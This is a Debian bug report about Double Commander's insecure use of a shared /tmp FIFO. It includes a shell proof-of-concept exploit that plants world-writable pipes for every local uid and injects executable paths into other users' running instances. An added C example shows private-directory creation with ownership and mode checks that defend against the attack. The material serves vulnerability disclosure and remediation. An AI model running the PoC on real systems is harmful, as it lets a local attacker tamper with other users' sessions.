[Pkg-pascal-devel] Bug#926223: doublecmd-gtk: insecure use of /tmp
Jakub Wilk
jwilk at jwilk.net
Tue Apr 2 10:32:31 BST 2019
Package: doublecmd-gtk
Version: 0.9.1-1
Tags: security
Double Commander uses /tmp/doublecmd--<uid> for communication, even when
this file is owned by another user.
A local attacker could exploit this to load paths into other users'
panels. A proof-of-concept exploit is attached.
Please move the communication pipe out of /tmp.
-- System Information:
Architecture: i386
--
Jakub Wilk
-------------- next part --------------
#!/bin/sh
set -e -u
cd /tmp
# Stage 1: pre-create a world-writable FIFO under the name Double Commander
# will use for every local user, before that user's instance gets to it.
getent passwd | while IFS=: read -r user _ uid _
do
    fifo="doublecmd--$uid"
    rm -f "$fifo" || true  # maybe stale fifo from the previous exploit run?
    if ! mkfifo -m 666 "$fifo"
    then
        printf 'Failed to mount the exploit against %s; Maybe try again later?\n' "$user"
        continue
    fi
done
# Stage 2: keep feeding a random executable path into the pipe of every
# running doublecmd instance, keyed by the uid it runs as.
while true
do
    for uid in $(ps --no-headers -C doublecmd -o uid)
    do
        sleep 1
        fifo="doublecmd--$uid"
        path=$(find /bin /sbin /usr/bin /usr/sbin /usr/games | shuf -n 1)
        len=${#path}
        pad=$((1024-len))
        {
            # Message header bytes followed by NUL padding; printf emits '0'
            # characters and tr turns them into NUL bytes.
            printf '\1\5\20\0\0\5\20\0\0\0\1%02050d' | tr '0' '\0'
            # The path is written untouched (it may itself contain a '0').
            printf '%s' "$path"
            # NUL-pad the path field to 1024 bytes, then the trailer.
            printf "%0${pad}d\1%01024d" | tr '0' '\0'
        } > "$fifo"
    done
    sleep 1
done
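The fix the report asks for has two parts: put the pipe in a directory only the user can write to, and, because a name in a shared directory can always be pre-planted, verify the pipe on the open descriptor before trusting it. The following C example is added here and is not part of the bug report or of Double Commander's code; it assumes a hypothetical file name doublecmd-<uid> under XDG_RUNTIME_DIR (Double Commander itself is written in Pascal, but the same system calls apply). It refuses a path that already exists, opens with O_NOFOLLOW and checks with fstat that the result is a FIFO owned by the current user and not writable by anyone else, and then exercises those checks against the kind of FIFO the PoC above leaves behind. The temp-dir and demo path names are constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcome of the checks below. */
enum fifo_check {
    FIFO_OK = 0,
    FIFO_ERR_OPEN,      /* open()/mkfifo() failed, e.g. a symlink hit O_NOFOLLOW */
    FIFO_ERR_EXISTS,    /* something already sits at the path: refuse to reuse it */
    FIFO_ERR_NOT_FIFO,  /* not a FIFO at all */
    FIFO_ERR_OWNER,     /* owned by another uid, the condition this bug reports */
    FIFO_ERR_MODE       /* group- or world-writable, so anyone can inject */
};

/* Build the per-user pipe path under XDG_RUNTIME_DIR (a 0700 directory owned
   by the user, so nobody else can pre-create names in it) instead of the
   shared /tmp. Returns -1 when no absolute runtime dir is known; the caller
   must then pick another private directory, never /tmp. The file name
   "doublecmd-<uid>" is an assumption made for this example. */
int runtime_fifo_path(const char *runtime_dir, uid_t uid, char *buf, size_t n)
{
    if (runtime_dir == NULL || runtime_dir[0] != '/')
        return -1;
    int len = snprintf(buf, n, "%s/doublecmd-%lu", runtime_dir, (unsigned long)uid);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Open the FIFO at `path` for reading and verify the open descriptor itself
   (fstat, not stat, so nothing can be swapped between check and use): it must
   be a FIFO, owned by `uid`, and writable by nobody else. */
enum fifo_check open_private_fifo(const char *path, uid_t uid, int *fd_out)
{
    struct stat st;
    enum fifo_check rc = FIFO_OK;
    *fd_out = -1;
    /* O_NOFOLLOW rejects a planted symlink; O_NONBLOCK keeps the read side
       from waiting for a writer while we inspect it. */
    int fd = open(path, O_RDONLY | O_NONBLOCK | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return FIFO_ERR_OPEN;
    if (fstat(fd, &st) != 0 || !S_ISFIFO(st.st_mode))
        rc = FIFO_ERR_NOT_FIFO;
    else if (st.st_uid != uid)
        rc = FIFO_ERR_OWNER;
    else if (st.st_mode & (S_IWGRP | S_IWOTH))
        rc = FIFO_ERR_MODE;
    if (rc != FIFO_OK) {
        close(fd);
        return rc;
    }
    *fd_out = fd;
    return FIFO_OK;
}

/* Create the pipe fresh with mode 0600. An existing entry at `path` is the
   attack precondition (the PoC pre-creates it), so refuse it rather than
   chmod-ing or unlinking it and carrying on. */
enum fifo_check create_private_fifo(const char *path, int *fd_out)
{
    *fd_out = -1;
    mode_t old = umask(077);
    int rc = mkfifo(path, 0600);
    umask(old);
    if (rc != 0)
        return errno == EEXIST ? FIFO_ERR_EXISTS : FIFO_ERR_OPEN;
    return open_private_fifo(path, getuid(), fd_out);
}

/* Demonstration in a fresh private temp dir: the attacker-style 0666 FIFO, a
   planted symlink, and a properly created pipe. A FIFO owned by another uid
   cannot be set up unprivileged, so that case rests on the st_uid comparison
   above. Returns 0 when every case behaves as expected, else a bitmask. */
int demo(void)
{
    char dir[256], planted[256], link[256], ours[256], want[256];
    int failures = 0, fd = -1;
    const char *tmp = getenv("TMPDIR");
    snprintf(dir, sizeof dir, "%s/fifo-demo-XXXXXX", tmp ? tmp : "/tmp");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(planted, sizeof planted, "%s/doublecmd--%lu", dir, (unsigned long)getuid());
    snprintf(link, sizeof link, "%s/doublecmd-link", dir);
    snprintf(ours, sizeof ours, "%s/doublecmd-private", dir);
    /* Case 1: what the PoC's `mkfifo -m 666` leaves behind is rejected. */
    mode_t old = umask(0);
    if (mkfifo(planted, 0666) != 0) failures |= 1;
    umask(old);
    if (open_private_fifo(planted, getuid(), &fd) != FIFO_ERR_MODE) failures |= 2;
    /* Case 2: creating our pipe at a pre-planted path must be refused. */
    if (create_private_fifo(planted, &fd) != FIFO_ERR_EXISTS) failures |= 4;
    /* Case 3: a symlink at the path is stopped by O_NOFOLLOW. */
    if (symlink(planted, link) != 0 ||
        open_private_fifo(link, getuid(), &fd) != FIFO_ERR_OPEN) failures |= 8;
    /* Case 4: a freshly created private pipe passes and yields a usable fd. */
    if (create_private_fifo(ours, &fd) != FIFO_OK || fd < 0) failures |= 16;
    if (fd >= 0) close(fd);
    /* Case 5: the path is built under the runtime dir, not /tmp. */
    if (runtime_fifo_path("/run/user/1000", 1000, want, sizeof want) != 0 ||
        strcmp(want, "/run/user/1000/doublecmd-1000") != 0) failures |= 32;
    unlink(link); unlink(ours); unlink(planted); rmdir(dir);
    return failures;
}

int main(void)
{
    int failures = demo();
    printf("demo: %s (0x%x)\n", failures == 0 ? "all cases as expected" : "FAILED", failures);
    return failures == 0 ? 0 : 1;
}
```

The ordering matters: the mode and ownership checks are made on the descriptor returned by open(), so an attacker who swaps the name between a stat() and the open() gains nothing, and a pre-existing entry is treated as an error rather than silently adopted, which is the behaviour the report describes as missing.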